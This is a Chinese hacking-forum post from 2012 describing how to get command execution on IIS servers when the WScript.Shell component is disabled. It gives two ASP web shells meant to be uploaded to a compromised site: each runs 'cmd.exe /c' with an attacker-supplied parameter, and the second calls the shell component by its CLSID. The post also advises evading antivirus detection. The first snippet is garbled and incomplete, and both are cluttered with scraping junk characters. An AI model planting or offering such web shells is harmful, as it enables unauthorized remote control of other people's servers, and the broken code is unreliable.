找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 没有wscript.shell组件提权方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 3019|回复: 0
打印 上一主题 下一主题

没有wscript.shell组件提权方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-10-21 09:08:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  • 可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。  g6 V4 e* d$ |7 A! D. ~' ?
  • 一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。9 ]# f: A6 w% v! j9 n0 Z
  • 要想让运行命令可以试试这种方法,成功率为五五之数。
    6 f3 l* H, y7 _) }
  • 把下面代码复制:+ A2 W4 V' y9 {5 i' i2 a. E9 V
  • <%5 K9 R# [" E. E. Z
  • end if* H8 ~7 k5 s1 ~+ r* P4 B' Z
  • response.write(”")- T3 J7 g5 b& f% z
  • On Error Resume
    # b6 t6 M+ L7 G# ~
  • Next7 f) D( E* |" _) m+ ?  B
  • response.write oScriptlhn.exec(”cmd.exe /c” &
    9 L8 S* ?* Q- r/ L
  • request(”c”)).stdout.readall
    % |4 K! N5 C7 p
  • response.write(”")( E- c5 }; a+ s* D" @: \. m
  • response.write(”")
    ; A+ K# c) Q4 H
  • response.write(”9 \" U( ~6 u* Y$ x$ n5 r' X5 c
  • “)
    2 @9 Z0 G+ ]& h7 H  m
  • response.write(”")3 y/ d, R8 Q* }
  • %>
    $ d$ b9 u, A* H7 ]9 s
  • 保存为一个asp文件,然后传到网站目录上去
    % a4 W1 h# l* F; q( E# V* g
  • 运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。! D& ?2 Z- e; }+ [5 E
  • 我用此成功运行过cacls命令。
    # J, S" H& q$ ~. ~9 K: n4 A
  • 第二那就是运行时出错,可能限制某些代码执行
    # y' r( L/ Y+ p9 K& T
  • 无wscript.shell组件提权又一个方法" R% P$ w: d# G% o
  • <object runat=server id=oScriptlhn scope=page
    $ |% E9 y! h, n3 J  s
  • 0 S6 i" o: Z/ ]9 `- W4 u8 F
  • classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>
    : r& @$ r  L* `7 P% z
  • <%if err then%> 4 M# K) N! ^4 E- U! r2 n0 m. B1 \
  • <object runat=server id=oScriptlhn scope=page 4 r, L& i" f( {4 Z  d9 f

  • ) [( R. r9 K; w9 Z% c
  • classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>  s8 G; F4 W$ y
  • <%
    9 |9 k8 U2 L; O' P9 }& r# Y$ y
  • end if
    , K3 C" ]3 P+ u: T1 r, Z; \
  • response.write(”<textarea readonly cols=80 ( P! g5 G" d! K
  •   Z) D0 G* h9 f& h; N$ O
  • rows=20>”) 2 z, L4 B; Q& t0 _4 o3 C9 x) Z
  • On Error Resume Next 3 C! o8 E4 r: l; m
  • response.write
      h+ e. U0 K+ I) Q5 }5 E
  • 8 Y/ j9 ]/ P& ~; g0 q
  • oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall7 |. w2 b( F; y0 O( a, D
  • response.write(”</textarea>”)
    : k) ^" ^( a' @: s4 k( y2 ?
  • response.write(”<form + t7 b$ b, L( F* q0 V  g
  • 5 u/ u% `6 O5 d
  • method=’post’>”)
    ) K5 e0 y/ z: q$ b. W, H
  • response.write(”<input type=text name=’c' : u# Y/ I. q& y3 L& h/ K
  • . @  y! r# p2 t0 |- Z
  • size=60><br>”) * ^- \- E! H0 `$ N
  • response.write(”<input type=submit 6 X1 I  v' O8 ]
  • ) ~  O, f) P* [
  • value=’执行’></form>”) : l. g$ j2 B! c: B
  • %>: Q4 }' u- u, d& @
  • 保存为ASP,此代码可能被杀,请注意免杀。7 ]' W4 v& ?: x0 Z: K
  • 原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建+ \& B& ^5 @8 s" ?# p/ H! c7 {
复制代码
request, server, 成功率

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表